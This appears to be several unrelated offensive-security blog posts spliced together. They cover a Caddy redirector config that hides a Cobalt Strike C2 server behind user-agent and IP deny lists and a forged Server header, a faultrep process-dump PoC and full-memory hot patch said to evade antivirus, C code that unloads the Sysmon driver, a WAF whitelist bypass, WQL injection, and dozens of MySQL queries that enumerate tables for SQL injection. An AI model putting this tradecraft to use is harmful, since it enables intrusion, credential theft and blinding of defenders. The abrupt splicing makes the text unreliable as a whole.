header User-Agent *bot*

A very well done bad_ua list can be found, for example, here: https://github.com/mitchellkrogza/nginx-ultimate-bad-bot-blocker/blob/master/_generator_lists/bad-user-agents.list

headers_standard.caddy
# Add a custom fingerprint signature
Server "Apache/2.4.50 (Unix) OpenSSL/1.1.1d"

X-Robots-Tag "noindex, nofollow, nosnippet, noarchive"

# disable FLoC tracking
Permissions-Policy interest-cohort=()

# enable HSTS
Strict-Transport-Security max-age=31536000;

# disable clients from sniffing the media type
X-Content-Type-Options nosniff

# clickjacking protection
X-Frame-Options DENY

# keep referrer data off of HTTP connections
Referrer-Policy no-referrer-when-downgrade

# Do not allow to cache the response
Cache-Control no-cache

We decided to heavily customize the response Server header to mislead any detection based on response headers.

SITES folder

You can think of this folder as similar to sites-available and sites-enabled in nginx: it’s where you store the whole host configuration.

Example front-end redirector (cdn.aptortellini.cloud.caddy)

From our experience (false, we are rookies) this file should contain a single host, because we decided to uniquely identify each individual host; but feel free to add as many as you want, you messy individual!

https://cdn.aptortellini.cloud {

	# Import the proxy upstream for the cobalt beacon
    import cobalt_proxy_upstream

    # Default security headers and custom header to mislead fingerprinting
    header {
            import ../filters/headers_standard.caddy
    }
	
	# Put caddy logs to a specified location
    log {
	    output file sites/logs/cdn.aptortellini.cloud.log
	    format console
	}
		
	# Define the root folder for the content of the website if you want to serve one
	root * www/cdn.aptortellini.cloud
    file_server
}

UPSTREAMS folder

This folder contains the entire upstream part; the inner reverse-proxy part has been deliberately split out because it often requires individual ad-hoc configurations.

cobalt_proxy_upstreams

Handle Directive: Evaluates a group of directives mutually exclusively from other handle blocks at the same level of nesting.

The handle directive is kind of similar to the location directive from nginx config: the first matching handle block will be evaluated. Handle blocks can be nested if needed.

To make things more comprehensive, here we have the sample of http-get block adopted in the Cobalt Strike malleable profile:

3

# Just a fancy name
(cobalt_proxy_upstream) {
    
	# This directive instructs Caddy to handle only requests which begin with /ms/ (the http-get block configured in the malleable profile for testing purposes)
    handle /ms/* {
       
	    # This is our list of User Agents we want to block
		@ua_denylist {
			import ../filters/bad_ua.caddy
		}

		# This is our list of IPs we want to block
		@ip_denylist {
			import ../filters/bad_ips.caddy
		}

		header {
			import ../filters/headers_standard.caddy
		}

		# Redirect blocked User-Agents
		route @ua_denylist {

             redir https://cultofthepartyparrot.com/ # redirect to another site, for example an external supplier site which provides services for the company you are targeting (sneaky move, I know..)
        }

		
		# Redirect blocked IPs
		route @ip_denylist {

             redir https://cultofthepartyparrot.com/ # redirect to another site, for example an external supplier website which provides services for the company you are targeting (sneaky move, I know..)
        }

	 	# Reverse proxy to our cobalt strike server on port 443 https
    	import reverse_proxy/cobalt.caddy
	}
}

REVERSE PROXY folder

The reverse proxy directive instructs Caddy to forward the HTTPS stream to the team server if the rules above are respected.

Cobalt Strike redirector to HTTPS endpoint

reverse_proxy https://<cobalt_strike_endpoint> {
    
	# This directive puts the original X-Forwarded-For header value in the upstream X-Forwarded-For header; you need this configuration, for example, if you are behind CloudFront, in order to obtain the correct external IP of the machine you just compromised
    header_up X-Forwarded-For {http.request.header.X-Forwarded-For}
	
	# Standard reverse proxy upstream headers
	header_up Host {upstream_hostport}
    header_up X-Forwarded-Host {host}
    header_up X-Forwarded-Port {port}
    
	# Caddy will not check for SSL certificate to be valid if we are defining the <cobalt_strike_endpoint> with an ip address instead of a domain
	transport http {
        tls
        tls_insecure_skip_verify
    }
}

WWW

This folder is reserved for hosting a website, in case you want to manually get your domains categorized.

Or..

take a cue from those who do things better than we do:

https://github.com/mdsecactivebreach/Chameleon

Starting Caddy

Once started, Caddy will automatically obtain the SSL certificate. Remember to start Caddy in the same folder where you placed your Caddyfile!

sudo caddy start

4

To reload the configuration, you can just run the following command in the root configuration folder of Caddy

sudo caddy reload

Getting a CS Beacon

Everything worked as expected and the beacon was obtained:

5

A final thought

This blog post is just the beginning of a series focused on building infrastructure for offensive security purposes; in the upcoming months we will expand it with additional components.

With this we just wanted to try something we never tried before, and we know there are multiple ways to expand the configuration or make it even better, so, if you are not satisfied with what we just wrote, feel free to offend us: we won’t take it personally, promise.

How to begin your own cybersecurity consulting business | Guest Kyle McNulty

By: Infosec
29 November 2021 at 08:00

On today’s podcast, Kyle McNulty of Secure Ventures talks about interviewing the people behind the most up-and-coming cybersecurity startups. We discuss the best advice he’s received on the show, how to get your own podcast off the ground and his own security startup, ConsultPlace.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

0:00 - Intro 
2:40 - Getting into cybersecurity
6:00 - McNulty’s education and career
9:50 - Getting into consulting and startups
14:08 - Secure Ventures podcast
17:45 - Best insight from a podcast guest
20:13 - Startup stories 
22:10 - Startups during COVID
23:42 - Advice for startups
25:22 - How to begin a podcast 
33:25 - Tips for cybersecurity newcomers
35:04 - Upcoming podcasts
36:15 - ConsultPlace work 
38:00 - Find more about McNulty
38:42 - Outro


MiniDumpWriteDump via Faultrep!CreateMinidump

8 September 2019 at 21:18

I found this old undocumented API, “CreateMinidumpW”, inside faultrep.dll on Windows XP and Windows Server 2003. This API ends up calling dbghelp!MiniDumpWriteDump to dump the process, dynamically loading dbghelp.dll at runtime.

The function takes 3 arguments. I really have no clue what the 3rd argument’s structure is; I passed 0 as the pointer to the structure, so by default we end up getting 0x21 as the MINIDUMP_TYPE.

CreateMinidumpW(DWORD dwProcessId, LPCWSTR lpFileName, struct tagSMDumpOptions *)



This is the call stack

dbgcore.dll!_MiniDumpWriteDump@28
faultrep.dll!InternalGenerateMinidumpEx(void *,unsigned long,void *,struct tagSMDumpOptions *,unsigned short const *,int)
faultrep.dll!InternalGenerateMinidump(void *,unsigned long,unsigned short const *,struct tagSMDumpOptions *,int)
faultrep.dll!CreateMinidumpW(unsigned long,unsigned short const *,struct tagSMDumpOptions *)

As you see it calls the dbghelp!MiniDumpWriteDump by loading the dbghelp.dll using the LoadLibraryExW API.

However, this function, ‘faultrep.dll!InternalGenerateMinidumpEx’, doesn’t produce a full dump. As you can see, it either passes 0x21, or it inspects the 3rd argument (the options structure) and based on that value passes 0x325.

0x21 = MiniDumpWithDataSegs | MiniDumpWithUnloadedModules

0x325 = MiniDumpWithDataSegs | MiniDumpWithHandleData | MiniDumpWithPrivateReadWriteMemory | MiniDumpWithProcessThreadData | MiniDumpWithUnloadedModules
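
These combinations can be verified against the MINIDUMP_TYPE enumeration in dbghelp.h; a quick compile-time sanity check:

#include <windows.h>
#include <dbghelp.h>

static_assert((MiniDumpWithDataSegs | MiniDumpWithUnloadedModules) == 0x21,
              "0x21 decomposition");
static_assert((MiniDumpWithDataSegs | MiniDumpWithHandleData |
               MiniDumpWithPrivateReadWriteMemory | MiniDumpWithProcessThreadData |
               MiniDumpWithUnloadedModules) == 0x325,
              "0x325 decomposition");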

What you could do is patch it to 0x2 to make it a ‘MiniDumpWithFullMemory’ dump. You can find the 64-bit version of the patched DLL here: https://github.com/OsandaMalith/WindowsInternals/tree/master/CreateMinidump

This is a PoC of calling this API. You can copy the DLL from Windows XP and it will work fine. Not sure how useful this is; just sharing what I found 🙂
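
The PoC itself was embedded in the original post; a hedged reconstruction of the call might look like this (the BOOL return type is an assumption, since the export is undocumented):

#include <windows.h>
#include <cstdio>
#include <cstdlib>

typedef BOOL(WINAPI* CreateMinidumpW_t)(DWORD dwProcessId, LPCWSTR lpFileName,
                                        void* pDumpOptions /* tagSMDumpOptions* */);

int wmain(int argc, wchar_t* argv[]) {
    if (argc != 3) {
        wprintf(L"usage: %s <pid> <dump file>\n", argv[0]);
        return 1;
    }
    HMODULE faultrep = LoadLibraryW(L"faultrep.dll");
    if (!faultrep) return 1;
    CreateMinidumpW_t pCreateMinidumpW =
        (CreateMinidumpW_t)GetProcAddress(faultrep, "CreateMinidumpW");
    if (!pCreateMinidumpW) return 1;
    // Passing 0 for the options structure yields MINIDUMP_TYPE 0x21.
    pCreateMinidumpW((DWORD)_wtoi(argv[1]), argv[2], nullptr);
    return 0;
}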

 

UPDATE: I wrote a hot patch for both the 32-bit and 64-bit faultrep DLLs. It will allow you to get a full process dump by passing MiniDumpWithFullMemory as the MINIDUMP_TYPE. Tested on Windows XP 32-bit and 64-bit; on other systems, copying the original DLLs into the same folder will work fine. You can find the repo with the DLL files here: https://github.com/OsandaMalith/WindowsInternals/tree/master/CreateMinidump/Hot%20Patch

Some uses 😉

I was in an engagement today and tried with success the CreateMinidump_HotPatch of @OsandaMalith in both win2003 x32 and Win10 x64. Especially in Windows 10 Symantec did not complain at all!!! pic.twitter.com/kKS1KqEqpa

— Spiros Fraganastasis (@m3g9tr0n) September 10, 2019



Unloading the Sysmon Minifilter Driver

22 September 2019 at 14:51

The binary fltMC.exe is used to manage minifilter drivers. You can easily load and unload minifilters using this binary. To unload the Sysmon driver you can use:

fltMC unload SysmonDrv

If this binary is flagged, we can unload the minifilter driver by calling ‘FilterUnload’, which is the Win32 equivalent of ‘FltUnloadFilter’. It will call the minifilter’s ‘FilterUnloadCallback’ (PFLT_FILTER_UNLOAD_CALLBACK) routine. This is the same as using fltMC, which performs a non-mandatory unload.
Calling this API requires SeLoadDriverPrivilege, and obtaining that privilege requires administrative permissions.

Here’s a simple C code I wrote to call the ‘FilterUnload’ API.

https://github.com/OsandaMalith/WindowsInternals/blob/master/Unload_Minifilter.c
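
Along the same lines as the linked code, a minimal sketch looks like this: enable SeLoadDriverPrivilege on our token, then ask the Filter Manager for a non-mandatory unload (run elevated; link against fltlib):

#include <windows.h>
#include <fltuser.h>
#include <cstdio>
#pragma comment(lib, "fltlib.lib")

// Enable a named privilege (e.g. SeLoadDriverPrivilege) on the current process token.
static BOOL EnablePrivilege(LPCWSTR name) {
    HANDLE token;
    TOKEN_PRIVILEGES tp = { 1 };
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &token))
        return FALSE;
    LookupPrivilegeValueW(nullptr, name, &tp.Privileges[0].Luid);
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    BOOL ok = AdjustTokenPrivileges(token, FALSE, &tp, 0, nullptr, nullptr);
    CloseHandle(token);
    return ok && GetLastError() != ERROR_NOT_ALL_ASSIGNED;
}

int main() {
    if (!EnablePrivilege(L"SeLoadDriverPrivilege"))
        return 1;
    HRESULT hr = FilterUnload(L"SysmonDrv"); // non-mandatory unload
    printf("FilterUnload returned 0x%08lx\n", (long)hr);
    return hr == S_OK ? 0 : 1;
}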


Note that when a minifilter driver is unloaded by the Filter Manager, the event is logged in the System log.

References:
https://www.osr.com/nt-insider/2017-issue2/introduction-standard-isolation-minifilters/

WQL Injection

6 October 2019 at 21:59

Generally in application security, user input must be sanitized. When it comes to SQL injection, the root cause is most of the time that the input is not sanitized properly. I was curious about Windows Management Instrumentation Query Language (WQL), which is the SQL of WMI: can we abuse WQL if the input is not sanitized?

I wrote a simple application in C++ which gets the service information from the Win32_Service class. It will display members such as Name, ProcessId, PathName, Description, etc.

This is the WQL Query.

SELECT * FROM win32_service where Name='User Input'

As you can see, I am using the IWbemServices::ExecQuery method to execute the query and the IEnumWbemClassObject::Next method to enumerate its members.

BSTR input = L"SELECT * FROM win32_service where Name='User Input'";

if (FAILED(hRes = pService->ExecQuery(L"WQL", input, WBEM_FLAG_FORWARD_ONLY, NULL, &pEnumerator))) {
	pLocator->Release();
	pService->Release();
	cout << "Unable to retrive Services: 0x" << std::hex << hRes << endl;
	return 1;
}

IWbemClassObject* clsObj = NULL;
int numElems;
while ((hRes = pEnumerator->Next(WBEM_INFINITE, 1, &clsObj, (ULONG*)&numElems)) != WBEM_S_FALSE) {
	if (FAILED(hRes)) break;
	VARIANT vRet;
	VariantInit(&vRet);
	if (SUCCEEDED(clsObj->Get(L"Name", 0, &vRet, NULL, NULL))
		&& vRet.vt == VT_BSTR) {
		wcout << L"Name: " << vRet.bstrVal << endl;
		VariantClear(&vRet);
	}
	clsObj->Release();
}

Once the user enters a service name the application will display its members.

I was wondering if it’s possible to make the query always true and return all the services of the target host, something like id=1 or 1=1 in SQLi, where we make the statement logically true.
Since the user input is not properly sanitized in this case, we can use the or keyword and enumerate all the services by using the like keyword.

SELECT * FROM win32_service where Name='Appinfo' or name like '[^]%'

You could simply use “%” as well.

This is just a simple demonstration to prove WQL injection; I’m sure there are better cases to demonstrate it. However, Extended WQL, a superset of WQL, can be used to combine statements and do more cool stuff; it’s used by the System Center Configuration Manager (SCCM). Always sanitize the input of your application.
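
As a minimal mitigation sketch (not part of the original demo): WQL uses the backslash as its escape character, so one defensive option is escaping backslashes and single quotes before embedding user input in the query string:

#include <string>

// Escape WQL string metacharacters in user input before query concatenation.
std::wstring EscapeWql(const std::wstring& input) {
    std::wstring out;
    for (wchar_t c : input) {
        if (c == L'\\' || c == L'\'') out += L'\\';
        out += c;
    }
    return out;
}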

You can download the applications from here to play around.
https://github.com/OsandaMalith/WMI/releases/download/1/WinServiceInfo.7z

Bypassing the WebARX Web Application Firewall (WAF)

12 October 2019 at 22:16

WebARX is a web application firewall with which you can protect your website from malicious attacks. As you can see, it was mentioned in TheHackerNews as well, and it has good ratings if you do some Googling.
https://thehackernews.com/2019/09/webarx-web-application-security.html

It turned out that the WebARX WAF can easily be bypassed by passing a whitelist string: the request won’t be processed by the WAF at all if it detects such a string.

Let’s first try it on their own website. This is a simple LFi payload.



Now, if I include a whitelist string such as ithemes-sync-request, the WAF is easily bypassed.

XSS PoC

Here’s an XSS PoC where we pass a simple script tag. The WAF detects the raw request when we pass it normally.

But if we include the ithemes-sync-request parameter, which is a whitelist string, the script tag gets executed.

LFi PoC

Here’s a normal payload which will block.

Once we apply the whitelist string it’s bypassed.

SQLi PoC

Here’s a normal payload which will block.

Once we apply the whitelist string it’s bypassed.

These whitelist strings are more like a kill switch for this firewall. I’m not quite sure the developers of this project understand the logic behind it; it looks more like something coded by an amateur programmer for a university assignment.

https://twitter.com/webarx_security/status/1181655018442760193

Alternatives to Extract Tables and Columns from MySQL and MariaDB

27 January 2020 at 22:48

I’ve previously published a post on extracting table names when /or/i is filtered, which also blocks the word information_schema. I did some more research into this area on my own and found many other tables from which you can extract table names. These are all the databases and tables I found that allow extracting table names apart from ‘information_schema.tables’. I have tested the following on MySQL 5.7.29 and MariaDB 10.3.18. There are 39 queries in total.

Sys

These views were added in MySQL 5.7.9.

mysql> SELECT object_name FROM `sys`.`x$innodb_buffer_stats_by_table` WHERE object_schema = DATABASE();
+-------------+
| object_name |
+-------------+
| emails      |
| flag        |
| referers    |
| uagents     |
| users       |
+-------------+
5 rows in set (0.04 sec)

mysql> SELECT TABLE_NAME FROM `sys`.`x$schema_flattened_keys` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| emails     |
| flag       |
| referers   |
| uagents    |
| users      |
+------------+
5 rows in set (0.01 sec)

mysql> SELECT TABLE_NAME FROM `sys`.`x$ps_schema_table_statistics_io` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| db         |
| emails     |
| flag       |
| referers   |
| uagents    |
| users      |
+------------+
6 rows in set (0.04 sec)

mysql> SELECT TABLE_NAME FROM `sys`.`x$schema_index_statistics` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| table_name |
+------------+
| users      |
| emails     |
| referers   |
| uagents    |
| flag       |
+------------+
5 rows in set (0.00 sec)

mysql> SELECT TABLE_NAME FROM `sys`.`x$schema_table_statistics` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| emails     |
| users      |
| flag       |
| referers   |
| uagents    |
+------------+
5 rows in set (0.03 sec)

mysql> SELECT TABLE_NAME FROM `sys`.`x$schema_table_statistics_with_buffer` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| referers   |
| uagents    |
| emails     |
| users      |
| flag       |
+------------+
5 rows in set (0.07 sec)

mysql> SELECT object_name FROM `sys`.`innodb_buffer_stats_by_table` WHERE object_schema = DATABASE();
+-------------+
| object_name |
+-------------+
| emails      |
| flag        |
| referers    |
| uagents     |
| users       |
+-------------+
5 rows in set (0.05 sec)

mysql> SELECT TABLE_NAME FROM `sys`.`schema_auto_increment_columns` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| table_name |
+------------+
| referers   |
| flag       |
| emails     |
| users      |
| uagents    |
+------------+
5 rows in set (0.14 sec)

mysql> SELECT TABLE_NAME FROM `sys`.`schema_index_statistics` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| table_name |
+------------+
| users      |
| emails     |
| referers   |
| uagents    |
| flag       |
+------------+
5 rows in set (0.00 sec)

mysql> SELECT TABLE_NAME FROM `sys`.`schema_table_statistics` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| users      |
| emails     |
| referers   |
| uagents    |
| flag       |
+------------+
5 rows in set (0.04 sec)

mysql> SELECT TABLE_NAME FROM `sys`.`schema_table_statistics_with_buffer` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| users      |
| emails     |
| flag       |
| referers   |
| uagents    |
+------------+
5 rows in set (0.09 sec)

Using these queries you can get the paths of the table files stored locally on disk, and from them extract the table names.

mysql> SELECT FILE FROM `sys`.`io_global_by_file_by_bytes` WHERE FILE REGEXP DATABASE();
+---------------------------------+
| file                            |
+---------------------------------+
| @@datadir\security\emails.ibd   |
| @@datadir\security\flag.ibd     |
| @@datadir\security\referers.ibd |
| @@datadir\security\uagents.ibd  |
| @@datadir\security\users.ibd    |
| @@datadir\security\uagents.frm  |
| @@datadir\security\referers.frm |
| @@datadir\security\users.frm    |
| @@datadir\security\emails.frm   |
| @@datadir\security\flag.frm     |
| @@datadir\security\db.opt       |
+---------------------------------+
11 rows in set (0.22 sec)

mysql> SELECT FILE FROM `sys`.`io_global_by_file_by_latency` WHERE FILE REGEXP DATABASE();
+---------------------------------+
| file                            |
+---------------------------------+
| @@datadir\security\flag.ibd     |
| @@datadir\security\uagents.ibd  |
| @@datadir\security\flag.frm     |
| @@datadir\security\emails.frm   |
| @@datadir\security\emails.ibd   |
| @@datadir\security\referers.ibd |
| @@datadir\security\referers.frm |
| @@datadir\security\users.frm    |
| @@datadir\security\users.ibd    |
| @@datadir\security\uagents.frm  |
| @@datadir\security\db.opt       |
+---------------------------------+

mysql> SELECT FILE FROM `sys`.`x$io_global_by_file_by_bytes` WHERE FILE REGEXP DATABASE();
+-----------------------------------------------------------------------------+
| file                                                                        |
+-----------------------------------------------------------------------------+
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\emails.ibd   |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\flag.ibd     |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\referers.ibd |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\uagents.ibd  |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\users.ibd    |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\uagents.frm  |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\referers.frm |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\users.frm    |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\emails.frm   |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\flag.frm     |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\db.opt       |
+-----------------------------------------------------------------------------+

mysql> SELECT FILE FROM `sys`.`x$io_global_by_file_by_latency` WHERE FILE REGEXP DATABASE();
+-----------------------------------------------------------------------------+
| file                                                                        |
+-----------------------------------------------------------------------------+
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\flag.ibd     |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\uagents.ibd  |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\flag.frm     |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\emails.frm   |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\emails.ibd   |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\referers.ibd |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\referers.frm |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\users.frm    |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\users.ibd    |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\uagents.frm  |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\db.opt       |
+-----------------------------------------------------------------------------+
11 rows in set (0.00 sec)

The following views store previously executed queries, much like a log. You can use regular expressions to find what you need.

mysql> SELECT QUERY FROM sys.x$statement_analysis WHERE QUERY REGEXP DATABASE();
+-----------------------------------------------------------------------------------------------------------------------------------+
| query                                                                                                                             |
+-----------------------------------------------------------------------------------------------------------------------------------+
| SHOW TABLE STATUS FROM `security`                                                                                                 |
| SHOW CREATE TABLE `security` . `emails`                                                                                           |
| SHOW CREATE TABLE `security` . `users`                                                                                            |
| SHOW CREATE TABLE `security` . `referers`                                                                                         |
+-----------------------------------------------------------------------------------------------------------------------------------+

mysql> SELECT QUERY FROM `sys`.`statement_analysis` where QUERY REGEXP DATABASE();
+-----------------------------------------------------------+
| query                                                     |
+-----------------------------------------------------------+
| SHOW TABLE STATUS FROM `security`                         |
| SHOW CREATE TABLE `security` . `emails`                   |
| SHOW CREATE TABLE `security` . `users`                    |
| SHOW CREATE TABLE `security` . `referers`                 |
| SELECT * FROM `security` . `users` LIMIT ?                |
| SHOW CREATE TABLE `security` . `uagents`                  |
| SHOW CREATE PROCEDURE `security` . `select_first_column`  |
| SHOW CREATE TABLE `security` . `users`                    |
| SHOW OPEN TABLES FROM `security` WHERE `in_use` != ?      |
| SHOW TRIGGERS FROM `security`                             |
| USE `security`                                            |
| USE `security`                                            |
+-----------------------------------------------------------+
12 rows in set (0.01 sec)

Performance_Schema

mysql> SELECT object_name FROM `performance_schema`.`objects_summary_global_by_type` WHERE object_schema = DATABASE();
+---------------------+
| object_name         |
+---------------------+
| emails              |
| referers            |
| uagents             |
| users               |
| flag                |
| select_first_column |
+---------------------+
6 rows in set (0.00 sec)

mysql> SELECT object_name FROM `performance_schema`.`table_handles` WHERE object_schema = DATABASE();
+-------------+
| object_name |
+-------------+
| emails      |
| referers    |
| uagents     |
| users       |
| users       |
| users       |
| users       |
| users       |
| users       |
| users       |
| emails      |
| flag        |
| referers    |
| uagents     |
| users       |
| emails      |
| flag        |
| referers    |
| uagents     |
| users       |
+-------------+
20 rows in set (0.00 sec)

mysql> SELECT object_name FROM `performance_schema`.`table_io_waits_summary_by_index_usage` WHERE object_schema = DATABASE();
+-------------+
| object_name |
+-------------+
| emails      |
| referers    |
| uagents     |
| users       |
| users       |
| flag        |
+-------------+
6 rows in set (0.00 sec)

mysql> SELECT object_name FROM `performance_schema`.`table_io_waits_summary_by_table` WHERE object_schema = DATABASE();
+-------------+
| object_name |
+-------------+
| emails      |
| referers    |
| uagents     |
| users       |
| flag        |
+-------------+
5 rows in set (0.00 sec)

mysql> SELECT object_name FROM `performance_schema`.`table_lock_waits_summary_by_table` WHERE object_schema = DATABASE();
+-------------+
| object_name |
+-------------+
| emails      |
| referers    |
| uagents     |
| users       |
| flag        |
+-------------+
5 rows in set (0.00 sec)

As mentioned before, the following table contains a log of all executed SQL queries, and sometimes you might find table names in it. For simplicity, I have used a regular expression to match the current database name.

mysql> SELECT digest_text FROM `performance_schema`.`events_statements_summary_by_digest` WHERE digest_text REGEXP DATABASE();
+-----------------------------------------------------------------------------------------------------------------------------------+
| digest_text                                                                                                                       |
+-----------------------------------------------------------------------------------------------------------------------------------+
| SHOW CREATE TABLE `security` . `emails`                                                                                           |
| SHOW CREATE TABLE `security` . `referers`                                                                                         |
| SHOW CREATE PROCEDURE `security` . `select_first_column`                                                                          |
| SHOW CREATE TABLE `security` . `uagents`                                                                                          |
+-----------------------------------------------------------------------------------------------------------------------------------+
17 rows in set (0.00 sec)

As before, we can fetch the local table file paths.

mysql> SELECT file_name FROM `performance_schema`.`file_instances` WHERE file_name REGEXP DATABASE();
+-----------------------------------------------------------------------------+
| file_name                                                                   |
+-----------------------------------------------------------------------------+
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\emails.ibd   |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\flag.ibd     |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\referers.ibd |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\uagents.ibd  |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\users.ibd    |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\emails.frm   |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\referers.frm |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\db.opt       |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\uagents.frm  |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\users.frm    |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\flag.frm     |
+-----------------------------------------------------------------------------+
11 rows in set (0.00 sec)

mysql> SELECT file_name FROM `performance_schema`.`file_summary_by_instance` WHERE file_name REGEXP DATABASE();
+-----------------------------------------------------------------------------+
| file_name                                                                   |
+-----------------------------------------------------------------------------+
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\emails.ibd   |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\flag.ibd     |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\referers.ibd |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\uagents.ibd  |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\users.ibd    |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\emails.frm   |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\referers.frm |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\db.opt       |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\uagents.frm  |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\users.frm    |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\flag.frm     |
+-----------------------------------------------------------------------------+
11 rows in set (0.00 sec)

MySQL

mysql> SELECT table_name FROM `mysql`.`innodb_table_stats` WHERE database_name = DATABASE();
+------------+
| table_name |
+------------+
| emails     |
| flag       |
| referers   |
| uagents    |
| users      |
+------------+
5 rows in set (0.00 sec)

mysql> SELECT table_name FROM `mysql`.`innodb_index_stats` WHERE database_name = DATABASE();
+------------+
| table_name |
+------------+
| emails     |
| emails     |
| emails     |
| flag       |
| flag       |
| flag       |
| referers   |
| referers   |
| referers   |
| uagents    |
| uagents    |
| uagents    |
| users      |
| users      |
| users      |
+------------+
15 rows in set (0.00 sec)

Information_Schema

mysql> SELECT TABLE_NAME FROM `information_schema`.`KEY_COLUMN_USAGE` WHERE CONSTRAINT_SCHEMA = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| emails     |
| flag       |
| referers   |
| uagents    |
| users      |
+------------+
5 rows in set (0.07 sec)

mysql> SELECT TABLE_NAME FROM `information_schema`.`KEY_COLUMN_USAGE` WHERE table_schema = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| emails     |
| flag       |
| referers   |
| uagents    |
| users      |
+------------+
5 rows in set (0.00 sec)

In this case, the name of the first (key) column can also be retrieved.

mysql> SELECT COLUMN_NAME FROM `information_schema`.`KEY_COLUMN_USAGE` WHERE table_schema = DATABASE();
+-------------+
| COLUMN_NAME |
+-------------+
| id          |
| id          |
| id          |
| id          |
| id          |
+-------------+
5 rows in set (0.00 sec)

mysql> SELECT TABLE_NAME FROM `information_schema`.`PARTITIONS` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| emails     |
| flag       |
| referers   |
| uagents    |
| users      |
+------------+
5 rows in set (0.01 sec)

In this table too, you can use the ‘column_name’ column to get the first column of all tables.

mysql> SELECT TABLE_NAME FROM `information_schema`.`STATISTICS` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| emails     |
| flag       |
| referers   |
| uagents    |
| users      |
+------------+
5 rows in set (0.00 sec)

mysql> SELECT TABLE_NAME FROM `information_schema`.`TABLE_CONSTRAINTS` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| emails     |
| flag       |
| referers   |
| uagents    |
| users      |
+------------+
5 rows in set (0.00 sec)

mysql> SELECT file_name FROM `information_schema`.`FILES` where file_name regexp database();
+-------------------------+
| file_name               |
+-------------------------+
| .\security\emails.ibd   |
| .\security\flag.ibd     |
| .\security\referers.ibd |
| .\security\uagents.ibd  |
| .\security\users.ibd    |
+-------------------------+
5 rows in set (0.00 sec)

Starting with MySQL 5.6, the InnoDB system tables are exposed through Information_Schema.

